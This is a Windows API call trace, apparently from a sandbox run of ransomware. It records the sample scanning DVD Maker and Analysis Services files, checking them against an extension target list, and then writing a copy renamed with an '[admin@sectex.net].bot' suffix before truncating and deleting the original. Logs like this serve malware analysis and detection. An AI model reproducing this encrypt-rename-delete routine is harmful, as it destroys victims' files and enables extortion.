	[0050.025] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.025] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=157214) returned 1
	[0050.025] CloseHandle (hObject=0x184) returned 1
	[0050.026] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv")) returned 0x20
	[0050.026] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.026] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.026] lstrlenW (lpString=".doc") returned 4
	[0050.026] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.026] lstrlenW (lpString=".docx") returned 5
	[0050.026] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0050.026] lstrlenW (lpString=".pdf") returned 4
	[0050.026] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.026] lstrlenW (lpString=".xls") returned 4
	[0050.026] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.026] lstrlenW (lpString=".xlsx") returned 5
	[0050.026] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0050.026] lstrlenW (lpString=".ppt") returned 4
	[0050.026] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.026] lstrlenW (lpString=".zip") returned 4
	[0050.026] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.026] lstrlenW (lpString=".rar") returned 4
	[0050.026] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.026] lstrlenW (lpString=".bz2") returned 4
	[0050.026] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.026] lstrlenW (lpString=".7z") returned 3
	[0050.026] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.026] lstrlenW (lpString=".dbf") returned 4
	[0050.026] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.027] lstrlenW (lpString=".1cd") returned 4
	[0050.027] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.027] lstrlenW (lpString=".jpg") returned 4
	[0050.027] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.027] lstrlenW (lpString=".doc") returned 4
	[0050.027] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.027] lstrlenW (lpString=".docx") returned 5
	[0050.027] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0050.027] lstrlenW (lpString=".pdf") returned 4
	[0050.027] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.027] lstrlenW (lpString=".xls") returned 4
	[0050.027] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.027] lstrlenW (lpString=".xlsx") returned 5
	[0050.027] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0050.027] lstrlenW (lpString=".ppt") returned 4
	[0050.027] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.027] lstrlenW (lpString=".zip") returned 4
	[0050.027] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.027] lstrlenW (lpString=".rar") returned 4
	[0050.027] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.027] lstrlenW (lpString=".bz2") returned 4
	[0050.027] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.027] lstrlenW (lpString=".7z") returned 3
	[0050.027] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.027] lstrlenW (lpString=".dbf") returned 4
	[0050.027] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.027] lstrlenW (lpString=".1cd") returned 4
	[0050.028] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.028] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 88
	[0050.028] lstrlenW (lpString=".jpg") returned 4
	[0050.028] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.028] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0050.028] lstrlenW (lpString="BabyBoyMainToScenesBackground.wmv") returned 33
	[0050.028] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0050.235] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=117214) returned 1
	[0050.235] CloseHandle (hObject=0x1b0) returned 1
	[0050.235] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv")) returned 0x20
	[0050.235] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.235] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.235] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.235] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.235] lstrlenW (lpString=".doc") returned 4
	[0050.235] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.235] lstrlenW (lpString=".docx") returned 5
	[0050.235] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1
	[0050.235] lstrlenW (lpString=".pdf") returned 4
	[0050.235] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.235] lstrlenW (lpString=".xls") returned 4
	[0050.235] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.235] lstrlenW (lpString=".xlsx") returned 5
	[0050.235] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1
	[0050.235] lstrlenW (lpString=".ppt") returned 4
	[0050.235] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.235] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.235] lstrlenW (lpString=".zip") returned 4
	[0050.235] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.235] lstrlenW (lpString=".rar") returned 4
	[0050.235] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.235] lstrlenW (lpString=".bz2") returned 4
	[0050.236] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.236] lstrlenW (lpString=".7z") returned 3
	[0050.236] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.236] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.236] lstrlenW (lpString=".dbf") returned 4
	[0050.236] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.236] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.236] lstrlenW (lpString=".1cd") returned 4
	[0050.236] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.236] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.236] lstrlenW (lpString=".jpg") returned 4
	[0050.236] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.236] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.236] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.236] lstrlenW (lpString=".doc") returned 4
	[0050.236] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.236] lstrlenW (lpString=".docx") returned 5
	[0050.236] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1
	[0050.236] lstrlenW (lpString=".pdf") returned 4
	[0050.236] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.236] lstrlenW (lpString=".xls") returned 4
	[0050.236] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.236] lstrlenW (lpString=".xlsx") returned 5
	[0050.236] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1
	[0050.236] lstrlenW (lpString=".ppt") returned 4
	[0050.236] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.236] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.236] lstrlenW (lpString=".zip") returned 4
	[0050.236] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.236] lstrlenW (lpString=".rar") returned 4
	[0050.236] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.236] lstrlenW (lpString=".bz2") returned 4
	[0050.236] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.236] lstrlenW (lpString=".7z") returned 3
	[0050.237] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.237] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.237] lstrlenW (lpString=".dbf") returned 4
	[0050.237] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.237] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.237] lstrlenW (lpString=".1cd") returned 4
	[0050.237] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.237] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 85
	[0050.237] lstrlenW (lpString=".jpg") returned 4
	[0050.237] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.237] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0050.237] lstrlenW (lpString="16_9-frame-image-mask.png") returned 25
	[0050.237] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0050.389] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1400) returned 1
	[0050.389] CloseHandle (hObject=0x1a8) returned 1
	[0050.389] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png")) returned 0x20
	[0050.389] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.389] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.389] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.389] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.389] lstrlenW (lpString=".doc") returned 4
	[0050.389] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0050.389] lstrlenW (lpString=".docx") returned 5
	[0050.389] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1
	[0050.389] lstrlenW (lpString=".pdf") returned 4
	[0050.389] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0050.389] lstrlenW (lpString=".xls") returned 4
	[0050.389] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0050.389] lstrlenW (lpString=".xlsx") returned 5
	[0050.389] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1
	[0050.389] lstrlenW (lpString=".ppt") returned 4
	[0050.389] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0050.389] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.389] lstrlenW (lpString=".zip") returned 4
	[0050.389] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0050.389] lstrlenW (lpString=".rar") returned 4
	[0050.389] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0050.389] lstrlenW (lpString=".bz2") returned 4
	[0050.389] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0050.390] lstrlenW (lpString=".7z") returned 3
	[0050.390] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0050.390] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.390] lstrlenW (lpString=".dbf") returned 4
	[0050.390] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0050.390] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.390] lstrlenW (lpString=".1cd") returned 4
	[0050.390] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0050.390] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.390] lstrlenW (lpString=".jpg") returned 4
	[0050.390] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0050.390] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.390] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.390] lstrlenW (lpString=".doc") returned 4
	[0050.390] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0050.390] lstrlenW (lpString=".docx") returned 5
	[0050.390] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1
	[0050.390] lstrlenW (lpString=".pdf") returned 4
	[0050.390] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0050.390] lstrlenW (lpString=".xls") returned 4
	[0050.390] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0050.390] lstrlenW (lpString=".xlsx") returned 5
	[0050.390] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1
	[0050.390] lstrlenW (lpString=".ppt") returned 4
	[0050.390] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0050.390] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.390] lstrlenW (lpString=".zip") returned 4
	[0050.390] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0050.390] lstrlenW (lpString=".rar") returned 4
	[0050.390] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0050.390] lstrlenW (lpString=".bz2") returned 4
	[0050.390] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0050.390] lstrlenW (lpString=".7z") returned 3
	[0050.390] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0050.391] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.391] lstrlenW (lpString=".dbf") returned 4
	[0050.391] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0050.391] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.391] lstrlenW (lpString=".1cd") returned 4
	[0050.391] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0050.391] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 78
	[0050.391] lstrlenW (lpString=".jpg") returned 4
	[0050.391] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0050.391] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0050.391] lstrlenW (lpString="background.png") returned 14
	[0050.391] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0050.515] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=194963) returned 1
	[0050.515] CloseHandle (hObject=0x1c0) returned 1
	[0050.515] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png")) returned 0x20
	[0050.515] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.515] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.515] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png") returned 67
	[0050.515] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png") returned 67
	[0050.515] lstrlenW (lpString=".doc") returned 4
	[0050.515] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0050.515] lstrlenW (lpString=".docx") returned 5
	[0050.515] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1
	[0050.515] lstrlenW (lpString=".pdf") returned 4
	[0050.515] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0050.515] lstrlenW (lpString=".xls") returned 4
	[0050.515] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0050.515] lstrlenW (lpString=".xlsx") returned 5
	[0050.515] lstrcmpiW (lpString1=".xlsx", lpString2="d.png") returned -1
	[0050.516] lstrlenW (lpString=".ppt") returned 4
	[0050.516] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0050.516] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png") returned 67
	[0050.516] lstrlenW (lpString=".zip") returned 4
	[0050.516] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0050.516] lstrlenW (lpString=".rar") returned 4
	[0050.516] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0050.516] lstrlenW (lpString=".bz2") returned 4
	[0050.516] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0050.516] lstrlenW (lpString=".7z") returned 3
	[0050.516] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0050.516] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png") returned 67
	[0050.516] lstrlenW (lpString=".dbf") returned 4
	[0050.516] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0052.053] GetFileSizeEx (in: hFile=0x204, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=28974) returned 1
	[0052.053] CloseHandle (hObject=0x204) returned 1
	[0052.053] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl")) returned 0x20
	[0052.053] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0052.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.053] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.053] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0052.054] GetLastError () returned 0x0
	[0052.054] ReadFile (in: hFile=0x204, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x712e, lpOverlapped=0x0) returned 1
	[0052.055] WriteFile (in: hFile=0x184, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x7130, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x7130, lpOverlapped=0x0) returned 1
	[0052.056] ReadFile (in: hFile=0x204, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0052.057] WriteFile (in: hFile=0x184, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0052.057] SetEndOfFile (hFile=0x184) returned 1
	[0052.057] CloseHandle (hObject=0x184) returned 1
	[0052.057] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.057] SetEndOfFile (hFile=0x204) returned 1
	[0052.058] CloseHandle (hObject=0x204) returned 1
	[0052.058] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.058] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl")) returned 1
